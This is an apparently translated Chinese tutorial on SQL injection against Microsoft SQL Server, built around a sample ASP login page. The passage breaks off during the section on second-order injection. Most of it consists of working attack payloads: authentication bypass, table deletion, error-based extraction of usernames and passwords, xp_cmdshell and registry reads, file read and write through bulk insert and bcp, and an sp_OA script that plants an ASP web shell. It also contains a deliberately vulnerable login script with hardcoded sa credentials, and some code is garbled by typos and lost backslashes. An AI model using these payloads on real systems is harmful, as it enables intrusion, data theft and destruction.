介紹：SQL是一種用于關系數據庫的結構化查詢語言。它分為許多種，但大多數都松散地基于美國國家標準化組織最新的標準SQL-92。典型的執行語句是query，它能夠收集比較有達標性的記錄并返回一個單一的結果集。SQL語言可以修改數據庫結構（數據定義語言）和操作數據庫內容（數據操作語言）。在這份文檔中，我們將特別討論SQLSERVER所使用的Transact-SQL語言。

當一個攻擊者能夠通過往query中插入一系列的sql語句來操作數據寫入到應用程序中去，我們管這種方法定義成SQL注入。

一個典型的SQL語句如下：

Select id,forename,surname from authors

這條語句將返回authors表中所有行的id，forename和surname列。這個結果可以被限制，例如：

Select id,forename,surname from authors where forename'john' and surname='smith'

需要著重指明的是字符串'john'和'smith'被單引號限制。明確的說，forename和surname字段是被用戶提供的輸入限制的，攻擊者可以通過輸入值來往這個查詢中注入一些SQL語句，

如下：

Forename：jo'hn

Surname：smith

查詢語句變為：

Select id,forename,surname from authors where forename='jo'hn' and surname='smith'

當數據庫試圖去執行這個查詢時，它將返回如下錯誤：

Server：Msg 170, Level 15, State 1, Line 1

Line 1：Incorrect syntax near 'hn'

造成這種結果的原因是插入了.作為定界符的單引號。數據庫嘗試去執行'hn'，但是失敗。如果攻擊者提供特別的輸入如：

Forename：jo';drop table authors—

Surname：

結果是authors表被刪除，造成這種結果的原因我們稍后再講。

看上去好象通過從輸入中去掉單引號或者通過某些方法避免它們都可以解決這個問題。這是可行的，但是用這種方法做解決方法會存在幾個困難。第一，并不是所有用戶提供的數據都是字符串。如果用戶輸入的是通過用戶id來查詢author，那我們的查詢應該像這樣：

Select id,forename,surname from authors where id=1234

在這種情況下，一個攻擊者可以非常簡單地在數字的結尾添加SQL語句，在其他版本的SQL語言中，使用各種各樣的限定符號；在數據庫管理系統JET引擎中，數據可以被使用'#'限定。第二，避免單引號盡管看上去可以，但是是沒必要的，原因我們稍后再講。

我們更進一步地使用一個簡單的ASP登陸頁面來指出哪些能進入SQLSERVER數據庫并且嘗試鑒別進入一些虛構的應用程序的權限。

這是一個提交表單頁的代碼，讓用戶輸入用戶名和密碼：

＜HTML>

＜HEAD>

＜TITLE>Login Page＜/TITLE>

＜/HEAD>

＜BODY bgcolor='000000' text='cccccc'>

＜FONT Face='tahoma' color='cccccc'>

＜CENTER>＜H1>Login＜/H1>

＜FORM action='process_loginasp' method=post>

＜TABLE>

＜TR>＜TD>Username：＜/TD>＜TD>＜INPUT type=text name=username size=100 width=100>＜/TD>＜/TR>

＜TR>＜TD>Password：＜/TD>＜TD>＜INPUT type=password name=password size=100 withd=100>＜/TD>＜/TR>

＜/TABLE>

＜INPUT type=submit value='Submit'>＜INPUT type=reset value='Reset'>

＜/FORM>

＜/Font>

＜/BODY>

＜/HTML>

下面是process_login.asp的代碼，它是用來控制登陸的：

＜HTML>

＜BODY bgcolor='000000' text='ffffff'>

＜FONT Face='tahoma' color='ffffff'>

＜STYLE>

p { font-size=20pt ! important}

font { font-size=20pt ! important}

h1 { font-size=64pt ! important}

＜/STYLE>

＜%@LANGUAGE = JScript %>

＜%

function trace( str ) {

if( Request.form("debug") == "true" )

Response.write( str );

}

function Login( cn ) {

var username;

var password;

username = Request.form("username");

password = Request.form("password");

var rso = Server.CreateObject("ADODB.Recordset");

var sql = "select * from users where username = '" + username + "' and password = '" + password + "'"; trace( "query: " + sql );

rso.open( sql, cn );

if (rso.EOF) {

rso.close();

%>

＜FONT Face='tahoma' color='cc0000'>

＜H1> ＜BR>＜BR>

＜CENTER>ACCESS DENIED＜/CENTER>

＜/H1>

＜/BODY>

＜/HTML>

＜% Response.end return; }

else {

Session("username") = "" + rso("username");

%>

＜FONT Face='tahoma' color='00cc00'>

＜H1> ＜CENTER>ACCESS GRANTED＜BR> ＜BR>

Welcome, ＜% Response.write(rso("Username")); Response.write( "＜/BODY>＜/HTML>" ); Response.end }

}

function Main() { //Set up connection

var username

var cn = Server.createobject( "ADODB.Connection" );

cn.connectiontimeout = 20;

cn.open( "localserver", "sa", "password" );

username = new String( Request.form("username") );

if( username.length > 0) {

Login( cn );

}

cn.close();

}

Main();

%>

出現問題的地方是process_lgin.asp中產生查詢語句的部分：

Var sql="select * from users where username='"+username+"' and password='"+password+"'";

如果用戶輸入的信息如下：

Username：';drop table users—

Password：

數據庫中表users將被刪除，拒絕任何用戶進入應用程序。'—'符號在Transact-SQL中表示忽略'—'以后的語句，';'符號表示一個查詢的結束和另一個查詢的開始。'—'位于username字段中是必須的，它為了使這個特殊的查詢終止，并且不返回錯誤。

攻擊者可以只需提供他們知道的用戶名，就可以以任何用戶登陸，使用如下輸入：

Username：admin'—

攻擊者可以使用users表中第一個用戶，輸入如下：

Username：' or 1=1—

更特別地，攻擊者可以使用完全虛構的用戶登陸，輸入如下：

Username：' union select 1,'fictional_user','some_password',1—

這種結果的原因是應用程序相信攻擊者指定的是從數據庫中返回結果的一部分。

通過錯誤消息獲得信息

這個幾乎是David Litchfield首先發現的，并且通過作者滲透測試的；后來David寫了一份文檔，后來作者參考了這份文檔。這些解釋討論了‘錯誤消息‘潛在的機制，使讀者能夠完全地了解它，潛在地引發他們的能力。

為了操作數據庫中的數據，攻擊者必須確定某些數據庫和某些表的結構。例如我們可以使用如下語句創建user表：

Create talbe users(

Id int,

Username varchar(255),

Password varchar(255),

Privs int

)

然后將下面的用戶插入到users表中：

Insert into users values(0,'admin','r00tr0x!',0xffff)

Insert into users values(0,'guest','guest',0x0000)

Insert into users values(0,'chris','password',0x00ff)

Insert into users values(0,'fred','sesame',0x00ff)

如果我們的攻擊者想插入一個自己的用戶。在不知道users表結構的情況下，他不可能成功。即使他比較幸運，至于privs字段不清楚。攻擊者可能插入一個'1'，這樣只給他自己一個低權限的用戶。

幸運地，如果從應用程序（默認為ASP行為）返回錯誤消息，那么攻擊者可以確定整個數據庫的結構，并且可以以程序中連接SQLSERVER的權限度曲任何值。

（下面以一個簡單的數據庫和asp腳本來舉例說明他們是怎么工作的）

首先，攻擊者想獲得建立用戶的表的名字和字段的名字，要做這些，攻擊者需要使用select語法的having子句：

Username：' having 1=1—

這樣將會出現如下錯誤：

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.id' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

/process_login.asp, line 35

因此現在攻擊者知道了表的名字和第一個地段的名字。他們仍然可以通過把字段放到group by子句只能感去找到一個一個字段名，如下：

Username：' group by users.id having 1=1—

出現的錯誤如下：

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.username' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

/process_login.asp, line 35

最終攻擊者得到了username字段后：

‘ group by users.id,users.username,users.password,users.privs having 1=1—

這句話并不產生錯誤，相當于：

select * from users where username=''

因此攻擊者現在知道查詢涉及users表，按順序使用列'id,username,password,privs'。

能夠確定每個列的類型是非常有用的。這可以通過使用類型轉化來實現，例如：

Username：' union select sum(username) from users—

這利用了SQLSERVER在確定兩個結果集的字段是否相等前應用sum子句。嘗試去計算sum會得到以下消息：

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a varchar data type as an argument.

/process_login.asp, line 35

這告訴了我們'username'字段的類型是varchar。如果是另一種情況，我們嘗試去計算sum()的是數字類型，我們得到的錯誤消息告訴我們兩個集合的字段數量不相等。

Username：' union select sum(id) from users—

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.

/process_login.asp, line 35

我們可以用這種技術近似地確定數據庫中任何表中的任何字段的類型。

這樣攻擊者就可以寫一個好的insert查詢，例如：

Username：';insert into users values(666,'attacker','foobar','0xffff)—

這種技術的潛在影響不僅僅是這些。攻擊者可以利用這些錯誤消息顯示環境信息或數據庫。通過運行一列一定格式的字符串可以獲得標準的錯誤消息：

select * from master ..sysmessages

解釋這些將實現有趣的消息。

一個特別有用的消息關系到類型轉化。如果你嘗試將一個字符串轉化成一個整型數字，那么字符串的所有內容會返回到錯誤消息中。例如在我們簡單的登陸頁面中，在username后面會顯示出SQLSERVER的版本和所運行的操作系統信息：

Username：' union select version,1,1,1—

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright (c) 1988-2000 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 2) ' to a column of data type int.

/process_login.asp, line 35

這句嘗試去將內置的'version'常量轉化成一個整型數字，因為users表中的第一列是整型數字。

這種技術可以用來讀取數據庫中任何表的任何值。自從攻擊者對用戶名和用戶密碼比較感興趣后，他們比較喜歡去從users表中讀取用戶名，例如：

Username：' union select min(username),1,1,1 from users where username>'a'—

這句選擇users表中username大于'a'中的最小值，并試圖把它轉化成一個整型數字：

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'admin' to a column of data type int.

/process_login.asp, line 35

因此攻擊者已經知道用戶admin是存在的。這樣他就可以重復通過使用where子句和查詢到的用戶名去尋找下一個用戶。

Username：' union select min(username),1,1,1 from users where username>'admin'—

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'chris' to a column of data type int.

/process_login.asp, line 35

一旦攻擊者確定了用戶名，他就可以開始收集密碼：

Username：' union select password,1,1,1 from users where username='admin'—

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'r00tr0x!' to a column of data type int.

/process_login.asp, line 35

一個更高級的技術是將所有用戶名和密碼連接長一個單獨的字符串，然后嘗試把它轉化成整型數字。這個例子指出：Transavt-SQL語法能夠在不改變相同的行的意思的情況下把它們連接起來。下面的腳本將把值連接起來：

begin declare @ret varchar(8000)

set @ret=':'

select @ret=@ret+' '+username+'/'+password from users where

username>@ret

select @ret as ret into foo

end

攻擊者使用這個當作用戶名登陸（都在一行）

Username: ''; begin declare @ret varchar(8000) set @ret='':'' select @ret=@ret+'' ''+username+''/''+password from users where username>@ret select @ret as ret into foo end—

這就創建了一個foo表，里面只有一個單獨的列''ret''，里面存放著我們得到的用戶名和密碼的字符串。正常情況下，一個低權限的用戶能夠在同一個數據庫中創建表，或者創建臨時數據庫。

然后攻擊者就可以取得我們要得到的字符串：

Username：'' union select ret,1,1,1 from foo—

Microsoft OLE DB Provider for ODBC Drivers error ''80040e07''

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value '': admin/r00tr0x! guest/guest chris/password fred/sesame'' to a column of data type int.

/process_login.asp, line 35

然后丟棄（刪除）表來清楚腳印：

Username：''; drop table foo—

這個例子僅僅是這種技術的一個表面的作用。沒必要說，如果攻擊者能夠從數據庫中獲得足夠的錯誤西，他們的工作就變的無限簡單。

獲得更高的權限

一旦攻擊者控制了數據庫，他們就想利用那個權限去獲得網絡上更高的控制權。這可以通過許多途徑來達到：

1. 在數據庫服務器上，以SQLSERVER權限利用xp_cmdshell擴展存儲過程執行命令。

2. 利用xp_regread擴展存儲過程去讀注冊表的鍵值，當然包括SAM鍵（前提是SQLSERVER是以系統權限運行的）

3. 利用其他存儲過程去改變服務器

4. 在連接的服務器上執行查詢

5. 創建客戶擴展存儲過程去在SQLSERVER進程中執行溢出代碼

6. 使用''bulk insert''語法去讀服務器上的任意文件

7. 使用bcp在服務器上建立任意的文本格式的文件

8. 使用sp_OACreate,sp_OAMethod和sp_OAGetProperty系統存儲過程去創建ActiveX應用程序，使它能做任何ASP腳本可以做的事情

這些只列舉了非常普通的可能攻擊方法的少量，攻擊者很可能使用其它方法。我們介紹收集到的攻擊關于SQL服務器的明顯攻擊方法，為了說明哪方面可能并被授予權限去注入SQL.。我們將依次處理以上提到的各種方法：

[xp_cmdshell]

許多存儲過程被創建在SQLSERVER中，執行各種各樣的功能，例如發送電子郵件和與注冊表交互。

Xp_cmdshell是一個允許執行任意的命令行命令的內置的存儲過程。例如：

Exec master..xp_cmdshell ''dir''

將獲得SQLSERVER進程的當前工作目錄中的目錄列表。

Exec master..xp_cmdshell ''net user''

將提供服務器上所有用戶的列表。當SQLSERVER正常以系統帳戶或域帳戶運行時，攻擊者可以做出更嚴重的危害。

[xp_regread]

另一個有用的內置存儲過程是xp_regXXXX類的函數集合。

Xp_regaddmultistring

Xp_regdeletekey

Xp_regdeletevalue

Xp_regenumkeys

Xp_regenumvalues

Xp_regread

Xp_regremovemultistring

Xp_regwrite

這些函數的使用方法舉例如下：

exec xp_regread HKEY_LOCAL_MACHINE,''SYSTEMCurrentControlSetServiceslanmanserverparameters'', ''nullsessionshares''

這將確定什么樣的會話連接在服務器上是可以使用的

exec xp_regenumvalues HKEY_LOCAL_MACHINE,''SYSTEMCurrentControlSetServicessnmpparametersvalidcommunities''

這將顯示服務器上所有SNMP團體配置。在SNMP團體很少被更改和在許多主機間共享的情況下，有了這些信息，攻擊者或許會重新配置同一網絡中的網絡設備。

這很容易想象到一個攻擊者可以利用這些函數讀取SAM，修改系統服務的配置，使它下次機器重啟時啟動，或在下次任何用戶登陸時執行一條任意的命令。

[其他存儲過程]

xp_servicecontrol過程允許用戶啟動，停止，暫停和繼續服務：

exec master..xp_servicecontrol ''start'',''schedule''

exec master..xp_servicecontrol ''start'',''server''

下表中列出了少量的其他有用的存儲過程：

Xp_availablemedia 顯示機器上有用的驅動器

Xp_dirtree 允許獲得一個目錄樹

Xp_enumdsn 列舉服務器上的ODBC數據源

Xp_loginconfig Reveals information about the security mode of the server

Xp_makecab 允許用戶在服務器上創建一個壓縮文件

Xp_ntsec_enumdomains 列舉服務器可以進入的域

Xp_terminate_process 提供進程的進程ID，終止此進程

[Linked Servers]

SQL SERVER提供了一種允許服務器連接的機制，也就是說允許一臺數據庫服務器上的查詢能夠操作另一臺服務器上的數據。這個鏈接存放在master.sysservers表中。如果一個連接的服務器已經被設置成使用''sp_addlinkedsrvlogin''過程，當前可信的連接不用登陸就可以訪問到服務器。''openquery''函數允許查詢脫離服務器也可以執行。

[Custom extended stored procedures]

擴展存儲過程應用程序接口是相當簡單的，創建一個攜帶惡意代碼的擴展存儲過程動態連接庫是一個相當簡單的任務。使用命令行有幾個方法可以上傳動態連接庫到SQL服務器上，還有其它包括了多種自動通訊的通訊機制，比如HTTP下載和FTP腳本。

一旦動態連接庫文件在機器上運行即SQL服務器能夠被訪問——這不需要它自己是SQL服務器——攻擊者就能夠使用下面的命令添加擴展存儲過程（這種情況下，我們的惡意存儲過程就是一個能輸出服務器的系統文件的小的木馬）：

Sp_addextendedproc ''xp_webserver'',''c: empxp_foo.dll''

在正常的方式下，這個擴展存儲過程可以被運行：

exec xp_webserver

一旦這個程序被運行，可以使用下面的方法將它除去：

xp_dropextendedproc ''xp_webserver''

[將文本文件導入表]

使用''bulk insert''語法可以將一個文本文件插入到一個臨時表中。簡單地創建這個表：

create table foo( line varchar(8000) )

然后執行bulk insert操作把文件中的數據插入到表中，如：

bulk insert foo from ''c:inetpubwwwrootprocess_login.asp''

可以使用上述的錯誤消息技術，或者使用''union''選擇，使文本文件中的數據與應用程序正常返回的數據結合，將數據取回。這個用來獲取存放在數據庫服務器上的腳本源代碼或者ASP腳本代碼是非常有用的。

[使用bcp建立文本文件]

使用''bulk insert''的相對技術可以很容易建立任意的文本文件。不幸的是這需要命令行工具。''bcp'',即''bulk copy program''

既然 bcp可以從SQL服務進程外訪問數據庫，它需要登陸。這代表獲得權限不是很困難，既然攻擊者能建立，或者利用整體安全機制(如果服務器配置成可以使用它)。

命令行格式如下：

bcp "select * from text..foo" queryout c:inetpubwwwroot uncommand.asp –c -Slocalhost –Usa –Pfoobar

''S''參數為執行查詢的服務器，''U''參數為用戶名，''P''參數為密碼，這里為''foobar''

[ActiveX automation scripts in SQL SERVER]

SQL SERVER中提供了幾個內置的允許創建ActiveX自動執行腳本的存儲過程。這些腳本和運行在windows腳本解釋器下的腳本，或者ASP腳本程序一樣——他們使用VBScript或JavaScript書寫，他們創建自動執行對象并和它們交互。一個自動執行腳本使用這種方法書寫可以在Transact-SQL中做任何在ASP腳本中，或者WSH腳本中可以做的任何事情。為了闡明這鞋，這里提供了幾個例子：

（1）這個例子使用''wscript.shell''對象建立了一個記事本的實例：

wscript.shell example

declare @o int

exec sp_oacreate ''wscript.shell'',@o out

exec sp_oamethod @o,''run'',NULL,''notepad.exe''

我們可以通過指定在用戶名后面來執行它：

Username：''; declare @o int exec sp_oacreate ''wscript.shell'',@o out exec sp_oamethod @o,''run'',NULL,''notepad.exe''—

(2)這個例子使用''scripting.filesystemobject''對象讀一個已知的文本文件：

--scripting.filesystemobject example – read a known file

declare @o int, @f int, @t int, @ret int

declare @line varchar(8000)

exec sp_oacreate ''scripting.filesystemobject'', @o out

exec sp_oamethod @o, ''opentextfile'', @f out, ''c:oot.ini'', 1

exec @ret=sp_oamethod @f,''readline'',@line out

while(@ret=0)

begin

print @line

exec @ret=sp_oamethod @f,''readline'',@line out

end

(3)這個例子創建了一個能執行通過提交到的任何命令：

-- scripting.filesystemobject example – create a ''run this''.asp file

declare @o int,@f int,@t int,@ret int

exec sp_oacreate ''scripting.filesystemobject'',@o out

exec sp_oamethod @o,''createtextfile'',@f out,''c:inetpubwwwrootfoo.asp'',1

exec @ret=sp_oamethod @f,''writeline'',NULL,''＜% set o=server.createobject("wscript.shell"):o.run(request.querystring("cmd")) %>''

需要指出的是如果運行的環境是WIN NT4+IIS4平臺上，那么通過這個程序運行的命令是以系統權限運行的。在IIS5中，它以一個比較低的權限IWAM_XXXaccount運行。

(4)這些例子闡述了這個技術的適用性；它可以使用''speech.voicetext''對象引起SQL SERVER發聲：

declare @o int,@ret int

exec sp_oacreate ''speech.voicetext'',@o out

exec sp_oamethod @o,''register'',NULL,''foo'',''bar''

exec sp_oasetproperty @o,''speed'',150

exec sp_oamethod @o,''speak'',NULL,''all your sequel servers are belong to,us'',528

waitfor delay ''00:00:05''

我們可以在我們假定的例子中，通過指定在用戶名后面來執行它（注意這個例子不僅僅是注入一個腳本，同時以admin權限登陸到應用程序）：

Username：admin'';declare @o int,@ret int exec sp_oacreate ''speech.voicetext'',@o out exec sp_oamethod @o,''register'',NULL,''foo'',''bar'' exec sp_oasetproperty @o,''speed'',150 exec sp_oamethod @o,''speak'',NULL,''all your sequel servers are belong to us'',528 waitfor delay ''00:00:05''--

[存儲過程]

傳說如果一個ASP應用程序在數據庫中使用了存儲過程，那么SQL注入是不可能的。這句話只對了一半，這要看ASP腳本中調用這個存儲過程的方式。

本質上，如果一個有參數的查詢被執行 ，并且用戶提供的參數通過安全檢查才放入到查詢中，那么SQL注入明顯是不可能發生的。但是如果攻擊者努力影響所執行查詢語句的非數據部分，這樣他們就可能能夠控制數據庫。

比較好的常規的標準是：

?如果一個ASP腳本能夠產生一個被提交的SQL查詢字符串，即使它使用了存儲過程也是能夠引起SQL注入的弱點。

?如果一個ASP腳本使用一個過程對象限制參數的往存儲過程中分配（例如ADO的用于參數收集的command對象），那么通過這個對象的執行，它一般是安全的。

明顯地，既然新的攻擊技術始終地被發現，好的慣例仍然是驗證用戶所有的輸入。

為了闡明存儲過程的查詢注入，執行以下語句：

sp_who ''1'' select * from sysobjects

or

sp_who ''1'';select * from sysobjects

任何一種方法，在存儲過程后，追加的查詢依然會執行。

[高級SQL注入]

通常情況下，一個web應用程序將會過濾單引號（或其他符號），或者限定用戶提交的數據的長度。

在這部分，我們討論一些能幫助攻擊者饒過那些明顯防范SQL注入，躲避被記錄的技術。

[沒有單引號的字符串]

有時候開發人員會通過過濾所有的單引號來保護應用程序，他們可能使用VBScript中的replace函數或類似：

function escape(input)

input=replace(input,"''","''''")

escape=input

end function

無可否認地這防止了我們所有例子的攻擊，再除去'';''符號也可以幫很多忙。但是在一個大型的應用程序中，好象個別值期望用戶輸入的是數字。這些值沒有被限定，因此為攻擊者提供了一個SQL注入的弱點。

如果攻擊者想不使用單引號產生一個字符串值，他可以使用char函數，例如：

insert into users values(666,

char(0x63)+char(0x68)+char(0x72)+char90x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char90x69)+char(0x73),

0xffff)

這就是一個能夠往表中插入字符串的不包含單引號的查詢。

淡然，如果攻擊者不介意使用一個數字用戶名和密碼，下面的語句也同樣會起作用：

insert into users values(667,

123,

123,

oxffff)

SQL SERVER自動地將整型轉化為varchar型的值。

[Second-Order SQL Injection]

即使應用程序總是過濾單引號，攻擊者依然能夠注入SQL同樣通過應用程序使數據庫中的數據重復使用。

例如，攻擊者可能利用下面的信息在應用程序中注冊：

Username：admin''—

Password：password

應用程序正確過濾了單引號，返回了一個類似這樣的insert語句：